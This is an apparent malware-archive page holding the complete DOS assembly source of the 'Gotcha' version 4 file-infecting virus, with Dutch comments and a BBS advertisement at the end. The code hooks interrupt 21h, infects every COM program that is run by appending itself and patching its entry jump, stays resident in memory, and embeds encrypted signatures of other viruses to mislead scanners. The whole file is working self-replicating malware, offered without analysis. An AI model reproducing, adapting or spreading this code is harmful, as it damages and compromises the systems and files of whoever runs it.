MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.gotcha4.asm
2021-01-12 17:44:11 -06:00

398 lines
13 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;****************************************************************************
;* stripped COM-versie
;* met signature's
;*
;****************************************************************************
cseg segment
assume cs:cseg,ds:cseg,es:nothing
org 100h
SIGNLEN equ signend - signature
FILELEN equ eind - begin
RESPAR equ (FILELEN/16) + 17
BUFLEN equ 08h
VERSION equ 4
.RADIX 16
;****************************************************************************
;* Opstart programma
;****************************************************************************
begin: xor bx,bx
mov cl,07h
crloop: call crypt
loop crloop
call install
int 20
;****************************************************************************
;* Data
;****************************************************************************
buffer db BUFLEN dup (?)
oi21 dw ?,?
oldlen dw ?
handle dw ?
sign db 0
;****************************************************************************
;* Interupt handler 21
;****************************************************************************
ni21: pushf
cmp ax,4B00h
jne ni_verder
push es
push ds
push ax
push bx
push cx
push dx
call attach
mov cl,[sign]
call crypt
inc cl
and cl,07h
mov [sign],cl
call crypt
pop dx
pop cx
pop bx
pop ax
pop ds
pop es
exit: popf
jmp dword ptr cs:[oi21] ;naar oude int-handler
ni_verder: cmp ax,0DADAh
jne exit
mov ax,0A500h+VERSION
popf
iret
;****************************************************************************
;* plakt programma aan file (ASCIIZ DS:DX)
;****************************************************************************
attach: cld
mov ax,3D02h ;open de file
int 21
jc finnish
push cs
pop ds
mov [handle],ax ;bewaar file-handle
call eindptr ;bepaal lengte
jc finnish
mov [oldlen],ax
sub ax,SIGNLEN ;pointer naar eind - SIGNLEN
sbb dx,0
mov cx,dx
mov dx,ax
mov al,00h
call ptrmov
jc finnish
mov cx,SIGNLEN ;lees de laatse bytes
mov dx,offset buffer
call flread
jc finnish
verder3: push cs ;vergelijk signature met buffer
pop es
mov di,offset buffer
mov si,offset signature
mov cx,SIGNLEN
rep cmpsb
or cx,cx
jz finnish
call beginptr ;lees begin van file
mov cx,BUFLEN
mov dx,offset buffer
call flread
jc finnish
cmp word ptr [buffer],5A4Dh
jz finnish
call writeprog ;schrijf programma naar file
jc finnish
mov ax,[oldlen] ;bereken call-adres
add ax,offset entry
sub ax,0103
mov byte ptr [buffer],0E9h
mov word ptr [buffer+1],ax
call beginptr ;pas begin van file aan
mov cx,BUFLEN
mov dx,offset buffer
call flwrite
jc finnish
finnish: mov bx,[handle] ;sluit de file
mov ah,3Eh
int 21
ret
;****************************************************************************
;* Crypt een signature
;****************************************************************************
crypt: push cx
mov al,14h
mul cl
add ax,offset virsig
mov si,ax
mov di,ax
push cs
push cs
pop ds
pop es
mov cx,0Ah
cryploop: lodsw
xor ax,0FFFFh
stosw
loop cryploop
pop cx
ret
;****************************************************************************
;* Schrijf programma naar file
;****************************************************************************
writeprog: call eindptr
mov cx,FILELEN
mov dx,offset begin
call flwrite
ret
;****************************************************************************
;* Subroutines voor file-pointer
;****************************************************************************
beginptr: mov al,00h ;naar begin van de file
xor cx,cx
xor dx,dx
jmp ptrmov
eindptr: mov al,02h ;naar eind van de file
xor cx,cx
xor dx,dx
; jmp ptrmov
ptrmov: mov ah,42h
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Subroutines voor lezen/schrijven
;****************************************************************************
flwrite: push cs
pop ds
mov ah,40h
mov bx,[handle]
int 21
ret
flread: push cs
pop ds
mov ah,3Fh
mov bx,[handle]
int 21
ret
;****************************************************************************
;* Activering vanuit file
;****************************************************************************
entry: call entry2
entry2: pop bx
sub bx,offset entry2 ;CS:BX is begin programma - 100
cld
mov ax,bx ;copieer oude begin terug
add ax,offset buffer
mov si,ax
mov di,0100
mov cx,BUFLEN
rep movsb
mov ax,0100h
push ax
entcall: mov ax,0DADAh ;kijk of al geinstalleerd
int 21h
cmp ah,0A5h
je entstop
call install ;installeer het programma
entstop: ret
;****************************************************************************
;* Installatie in het geheugen
;****************************************************************************
install: push ds
push es
xor ax,ax ;haal oude vector
mov es,ax
mov cx,word ptr es:0084h
mov dx,word ptr es:0086h
mov [bx+offset oi21],cx
mov [bx+offset oi21+2],dx
mov ax,ds ;pas geheugen-grootte aan
dec ax
mov es,ax
cmp byte ptr es:[0000h],5Ah
jnz cancel
mov ax,es:[0003h]
sub ax,RESPAR
jb cancel
mov es:[0003h],ax
sub es:[0012h], word ptr RESPAR
mov es,es:[0012h] ;copieer programma naar top
mov ax,bx
add ax,0100
mov si,ax
mov di,0100h
mov cx,FILELEN
rep movsb
mov dx,offset ni21 ;zet nieuwe vector
push es
pop ds
mov ax,2521h
int 21h
cancel: pop es
pop ds
ret
;****************************************************************************
;* Tekst en Signature
;****************************************************************************
virsig:
;SYSLOCK Virus
db 0D1h, 0E9h, 8Ah, 0E1h
db 8Ah, 0C1h, 33h, 06h
db 14h, 00h, 31h, 04h
db 46h, 46h, 0E2h, 0F2h
db 5Eh, 59h, 58h, 0C3h
;Sylvia Virus
db 8Dh, 36h, 03h, 01h
db 33h, 0C9h, 33h, 0C0h
db 0ACh, 3Ch, 1Ah, 74h
db 04h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;DATACRIME IIb Virus
db 2Eh, 8Ah, 07h, 32h
db 0C2h, 0D0h, 0CAh, 2Eh
db 88h, 07h, 43h, 0E2h
db 0F3h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Yankee-Go-Home Virus (Enigma)
db 0D8h, 0Eh, 1Fh, 0BEh
db 37h, 08h, 81h, 0EEh
db 03h, 01h, 03h, 0F3h
db 89h, 04h, 0BEh, 39h
db 08h, 81h, 0EEh, 03h
;Slowdown Virus
db 0DEh, 90h, 90h, 81h
db 0C6h, 1Bh, 00h, 0B9h
db 90h, 06h, 2Eh, 80h
db 34h, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Scotts Valley Virus
db 5Eh, 8Bh, 0DEh, 90h
db 90h, 81h, 0C6h, 32h
db 00h, 0B9h, 12h, 08h
db 2Eh, 90h, 90h, 90h
db 90h, 90h, 90h, 90h
;Tiny-2A related Virus
db 0A5h, 8Eh, 0C1h, 0A6h
db 74h, 12h, 4Eh, 4Fh
db 0F3h, 0A5h, 8Eh, 0C1h
db 93h, 91h, 91h, 26h
db 87h, 85h, 0E0h, 0FEh
;DATACRIME 1280 Virus
db 8Bh, 36h, 01h, 01h
db 83h, 0EEh, 03h, 8Bh
db 0C6h, 3Dh, 00h, 00h
db 75h, 03h, 0E9h, 02h
db 01h, 90h, 90h, 90h
;;July13 Virus
; db 0A0h, 12h, 00h, 34h
; db 90h, 0BEh, 12h, 00h
; db 0B9h, 0B1h, 04h, 2Eh
; db 30h, 04h, 46h, 0E2h
; db 0FAh, 90h, 90h, 90h
;;XA1 Virus (Tannenbaum)
;virsig: db 0FAh, 8Bh, 0ECh, 58h
; db 32h, 0C0h, 89h, 46h
; db 02h, 81h, 46h, 00h
; db 28h, 00h, 90h, 90h
; db 90h, 90h, 90h, 90h
;;Twelve Tricks Trojan Dropper
; db 0BEh, 64h, 02h, 31h
; db 94h, 42h, 01h, 0D1h
; db 0C2h, 4Eh, 79h, 0F7h
; db 90h, 90h, 90h, 90h
; db 90h, 90h, 90h, 90h
signature: db 'GOTCHA!',0
signend:
eind:
cseg ends
end begin

; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>